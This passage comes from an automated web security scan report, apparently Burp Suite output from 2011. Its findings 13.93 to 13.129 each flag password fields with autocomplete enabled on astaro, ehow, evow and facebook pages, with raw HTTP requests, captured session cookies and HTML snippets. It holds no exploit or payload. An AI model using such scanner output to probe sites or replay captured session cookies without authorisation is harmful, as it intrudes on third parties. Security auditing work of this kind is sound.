<td style="padding-left: 10px;"><input class="halfbox" type="password" size="10" name="Password" id="password" value="" /></td>
...[SNIP]...

13.93. https://www.astaro.com/en/user/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/en/user/login

Issue detail

The page contains a form with the following action URL:

https://www.astaro.com/en/user/login

The form contains the following password field with autocomplete enabled:

Password

Request

GET /en/user/login HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-4; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.4.10.1296568533;

Response

13.94. https://www.astaro.com/tool/signup previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/tool/signup

Issue detail

The page contains a form with the following action URL:

https://www.astaro.com/tool/signup

The form contains the following password fields with autocomplete enabled:

password
passwordConfirm

Request

GET /tool/signup HTTP/1.1
Host: www.astaro.com
Connection: keep-alive
Referer: https://www.astaro.com/user/login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; session_start_time=1296568531414; k_visit=2; push_time_start=1296569531420; s_cc=true; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; has_js=1; __unam=fa38af9-12dddaf19a7-13ff2714-5; __utma=112476180.1215039085.1296493738.1296504424.1296568533.3; __utmc=112476180; __utmb=112476180.7.10.1296568533; __utma=1.546991621.1296493738.1296493738.1296493738.1; __utmc=1; __utmb=112476180.8.10.1296568533; s_sq=lm-astaro-prod%3D%2526pid%253Dhttps%25253A//www.astaro.com/user/login%2526oid%253Dhttps%25253A//www.astaro.com/tool/signup%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:56:58 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 13:56:58 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.com
Content-language: en-US
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 20898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta
...[SNIP]...
</p>
       <form action="/tool/signup" method="post" name="contactForm" id="contactForm">

       <table>
...[SNIP]...
<td><input size="20" maxlength="64" name="password" type="password" /></td>
...[SNIP]...
<td><input size="20" maxlength="64" name="passwordConfirm" type="password" /></td>
...[SNIP]...

13.95. https://www.astaro.com/user/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/user/login

Issue detail

The page contains a form with the following action URL:

https://www.astaro.com/en/user/login

The form contains the following password field with autocomplete enabled:

Password

Request

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:55:49 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: eZSESSIDen=3arq6oafh8mmgccr289cup83h1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 13:55:49 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.com
Content-language: en-US
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 8951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta
...[SNIP]...
</h1>
       <form method="post" action="/en/user/login">

           <input type="hidden" name="RedirectURI" value="" />
...[SNIP]...
<td style="padding-left: 10px;"><input class="halfbox" type="password" size="10" name="Password" id="password" value="" /></td>
...[SNIP]...

13.96. https://www.astaro.de/beacon/(beid previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.astaro.de
Path:	/beacon/(beid

Issue detail

The page contains a form with the following action URL:

https://www.astaro.de/user/login

The form contains the following password field with autocomplete enabled:

Password

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:30:08 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: eZSESSIDde=osr305vfiegtr4m0rumdbdt3r7; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 14:30:08 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.de
Content-language: de-DE
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE">
<head>

...[SNIP]...
</h1>
       <form method="post" action="/user/login">
           <input type="hidden" name="RedirectURI" value="beacon/(beid" />
...[SNIP]...
<td style="padding-left: 10px;"><input class="halfbox" type="password" size="10" name="Password" id="password" value="" /></td>
...[SNIP]...

13.97. https://www.astaro.net/beacon/(beid previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.astaro.net
Path:	/beacon/(beid

Issue detail

The page contains a form with the following action URL:

https://www.astaro.net/en/user/login

The form contains the following password field with autocomplete enabled:

Password

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:30:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: eZSESSIDen=bsb7dte2ge5s4c59fbs7127q65; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 14:30:13 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.net
Content-language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta
...[SNIP]...
</h1>
       <form method="post" action="/en/user/login">
           <input type="hidden" name="RedirectURI" value="beacon/(beid" />
...[SNIP]...
<td style="padding-left: 10px;"><input class="halfbox" type="password" size="10" name="Password" id="password" value="" /></td>
...[SNIP]...

13.98. http://www.astaro.org/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.astaro.org
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.astaro.org/login.php?do=login

The form contains the following password field with autocomplete enabled:

vb_login_password

Request

GET / HTTP/1.1
Host: www.astaro.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.99. http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.delish.com
Path:	/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips

Issue detail

The page contains a form with the following action URL:

https://login.delish.com/registration/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.100. http://www.demandstudios.com/ehow-writers.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.demandstudios.com
Path:	/ehow-writers.html

Issue detail

The page contains a form with the following action URL:

https://www.demandstudios.com/login.aspx

The form contains the following password field with autocomplete enabled:

password

Request

GET /ehow-writers.html HTTP/1.1
Host: www.demandstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:44:39 GMT
Server: Microsoft-IIS/6.0
x-server-info: new server
Hostname: sjl01wdsweb01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: BIGipServerdemandstudios.com-69.64.153.116-80=613812490.20480.0000; path=/ ; domain=demandstudios.com; path=/
Set-Cookie: ASP.NET_SessionId=rd34yp45uiciisjz3xjl2e45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22419

<!doctype html>
<html lang="en-US">

<head>
   <title>Write for eHow | Demand Media Studios</title>
   <meta charset="UTF-8"/>

   <link href="/ui/images/favicon.ico" rel="shortcut icon" />

   <
...[SNIP]...
<div id="loginwindow">
                       <form action="https://www.demandstudios.com/login.aspx" method="post" name="Login" class="Form1">
                       <input type="hidden" name="method" value="account-signin" />
...[SNIP]...
<dd><input name="password" type="password" id="password" /></dd>
...[SNIP]...

13.101. http://www.ehow.com/account/simple_login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_login.aspx

Issue detail

The page contains a form with the following action URL:

http://www.ehow.com/account/simple_login.aspx?afterLogin=

The form contains the following password field with autocomplete enabled:

user_password

Request

Response

13.102. http://www.ehow.com/account/simple_register.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_register.aspx

Issue detail

The page contains a form with the following action URL:

http://www.ehow.com/account/simple_register.aspx?afterLogin=submit_frmMail

The form contains the following password fields with autocomplete enabled:

password
password2

Request

GET /account/simple_register.aspx?afterLogin=submit_frmMail HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

13.103. http://www.ehow.com/account/simple_register.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_register.aspx

Issue detail

The page contains a form with the following action URL:

http://www.ehow.com/account/simple_register.aspx

The form contains the following password fields with autocomplete enabled:

password
password2

Request

Response

13.104. https://www.ehow.com/account/simple_login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/account/simple_login.aspx

Issue detail

The page contains a form with the following action URL:

https://www.ehow.com/account/simple_login.aspx?afterLogin=

The form contains the following password field with autocomplete enabled:

user_password

Request

GET /account/simple_login.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:45:02 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7183

<!DOCTYPE html>
<html id="www-ehow-com">
   <head>
       <title>Sign in to your eHow Account</title>
       <meta name="siteid" scheme="DMINSTR2" content="EHWC" />
       <meta name="pagetype" scheme="DMINSTR2
...[SNIP]...
</p>

                   <form action="https://www.ehow.com/account/simple_login.aspx?afterLogin=" method="post">

                    <fieldset>
...[SNIP]...
</label>
                           <input type="password" id="simplePwd" name="user_password" value="" />
                           <div class="note">
...[SNIP]...

13.105. https://www.ehow.com/account/simple_register.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/account/simple_register.aspx

Issue detail

The page contains a form with the following action URL:

https://www.ehow.com/account/simple_register.aspx

The form contains the following password fields with autocomplete enabled:

password
password2

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:45:08 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
   <head>
       <title>Register fo
...[SNIP]...
</p>

           <form name="simpleForm" method="post" action="simple_register.aspx" id="simpleForm">
<div>
...[SNIP]...
</label>
                       <input type="password" name="password" value="" id="simplePwd" />
                   </div>
...[SNIP]...
</label>
                    <input type="password" name="password2" value="" id="simpleConfirmPwd" />
                       </div>
...[SNIP]...

13.106. https://www.ehow.com/forms/signin.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/signin.aspx

Issue detail

The page contains a form with the following action URL:

https://www.ehow.com/forms/signin.aspx

The form contains the following password field with autocomplete enabled:

user_password

Request

GET /forms/signin.aspx HTTP/1.1
Host: www.ehow.com
Connection: keep-alive
Referer: http://www.ehow.com/account/simple_login.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; google-autocomplete=autocomplete; oml=direct; oms=homepage; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; __utmc=101451733; __utmb=101451733.3.10.1296659524; rsi_segs=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 02 Feb 2011 15:14:49 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 24227

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Sign In to eHow | eHow.com
</title>
       <meta
...[SNIP]...
</ol>


       <form id="form1" action="" method="post" class="FLC">
<input type="hidden" name="cid" value="-1" />
...[SNIP]...
</label>

    <input type="password" id="user_password" name="user_password" class="txtbox" MaxLength="50" Columns="22" value="" /><br />
...[SNIP]...

13.107. http://www.evow.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.evow.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.evow.com/home.aspx

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.evow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.108. http://www.evow.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.evow.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.evow.com/default.aspx

The form contains the following password fields with autocomplete enabled:

ffvhekhe
Passwordconfirm

Request

GET / HTTP/1.1
Host: www.evow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.109. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=J5foX; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 21:51:01 GMT
Content-Length: 30789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.110. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=J5foX; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 21:51:01 GMT
Content-Length: 30789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" id="reg_instance" name="reg_instance" value="xNFJTYJu7tPBzUkyTEn2Ng8E" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

13.111. http://www.facebook.com/%s previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/%s

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /%s HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

13.112. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

13.113. http://www.facebook.com/MillenniumHotels previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/MillenniumHotels

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /MillenniumHotels HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

13.114. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.115. http://www.facebook.com/btaylor previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/btaylor

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.116. http://www.facebook.com/careers/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.117. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.118. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.119. http://www.facebook.com/facebook previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.120. http://www.facebook.com/help/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.121. http://www.facebook.com/ligatt previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ligatt

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.122. http://www.facebook.com/platform previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/platform

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.123. http://www.facebook.com/plugins/facepile.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/facepile.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /plugins/facepile.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

13.124. http://www.facebook.com/policy.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/policy.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.125. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.126. http://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.127. http://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/r.php?possible_fb_user=1&app_id=0&is_enabled=1&next=&locale=en_US

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

13.128. http://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/r.php

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

13.129. http://www.facebook.com/r.php previous next

Summary

Severity:	Low
